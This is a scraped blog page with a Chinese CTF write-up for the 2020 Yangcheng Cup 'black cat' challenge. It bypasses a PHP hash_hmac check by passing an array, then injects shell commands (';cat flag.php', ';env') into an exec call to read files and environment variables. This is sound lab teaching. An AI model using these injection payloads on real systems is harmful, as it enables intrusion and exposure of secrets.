当前位置: 首页 > news >正文

网站建设设计要点网站备案换主体

网站建设设计要点,网站备案换主体,河南网站建设外贸,织梦cms首页模板文件是哪个[羊城杯 2020]black cat 1 解题流程1.1 第一步1.2 第二步1.3 第三步 1 解题流程 1.1 第一步 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php下载歌,用010打开,发现有一段内容if(empty($_POST[Black-Cat-Sheriff]) |…

[羊城杯 2020]black cat

  • 1 解题流程
    • 1.1 第一步
    • 1.2 第二步
    • 1.3 第三步

1

1 解题流程

1.1 第一步

  1. 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php
  2. 下载歌,用010打开,发现有一段内容
    if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){die('Ë­£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
    }
    $clandestine = getenv("clandestine");		//获取环境变量
    if(isset($_POST['White-cat-monitor']))$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
    $hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
    if($hh !== $_POST['Black-Cat-Sheriff']){die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
    }
    echo exec("nc".$_POST['One-ear']);
    

1.2 第二步

  1. 这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor
    这里有3个if,首先第一个肯定绕过;
          第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空
          第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行
    特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
  2. 最后一个if判断,编写一个脚本,生成加密结果
    <?php$hh = hash_hmac('sha256',';cat flag.php', null);echo $hh;
    ?>
    结果:04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
    
  3. exec(‘nc’.) 这里拼接命令,如果直接传cat flag.php会变成 => exec('nc’cat flag.php)无法执行
    只要是系统命令的执行,可以通过;来拼接命令,所以one-ear=;cat flag.php => exec('nc';cat flag.php)

1.3 第三步

我先用ls ls …/ ls /等都没结果,考虑其他

  1. ?Black-Cat-Sheriff=83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395&One-ear=;dir&White-cat-monitor[]=1
    得到: Hei_Mao_Jing_Chang.mp3 flag.php index.php js scss
  2. Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1
    得到: “GWHT{y0u_mu3t_p@y_atTentiou_!0_lt}”;
    提交后发现这个flag是错的
  3. 如果cat flag.php没出来,就cat /flag,或者env
    Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env&White-cat-monitor[]=1
    得到:FLAG=flag{e325e53c-76d2-40b8-a41a-4dd88185afdb}
http://www.yayakq.cn/news/798/

相关文章:

  • dz增加网站标签重庆长寿网站设计公司
  • 重庆模板网站建站西安百度推广排名
  • 网站带数据库下载备案空壳网站通知
  • ps个人网站怎么做电子工程网
  • 网站开发汇报ppt模板Wordpress在中国建站
  • 安监网站如何做紧急预案备案长沙网站推广合作
  • 网站开发团队需配备什么岗位现在做网站怎么赚钱
  • 网站建设发展趋势百度推广培训机构
  • 威海市高区建设局网站深圳外贸建站与推广
  • 营销型网站建设要求wordpress通用型大气简洁企业主题
  • 北京高端网站建设宣传做网站所需要的资质
  • 企业移动网站品牌网络公关公司电话
  • 网站建设题库及答案装修网站有哪些
  • 网站建设方案外包网页设计素材图片大全
  • 广州市城市建设档案馆网站上海seo网站设计
  • 怎么自己建设公司网站长春专业做网站公司
  • 网站建设用模板好吗app网站
  • 佛山网站建设企业推荐海南在线
  • 工程信息网站谁做免费代理上网网站
  • 石家庄seo网站推广商城网站离不开支付系统
  • 外贸业务员做网站系统安装wordpress
  • 网站传送门怎么做免费网站app代码
  • 建设网站的技术风险如何创建个人博客wordpress
  • 郑州网站建设快速排名熊掌普陀酒店网站建设
  • 网站建设前十名移动互联网开发安全案例
  • 建筑人才招聘网站平台广州响应式网站建设
  • 网站购物车设计小程序游戏开发平台
  • cnzz 网站域名怎么填网站访问找不到域名怎么回事
  • 微信订阅号做微网站自己做网站挂广告怎么赚钱
  • 网站建设力洋网站建设官方商城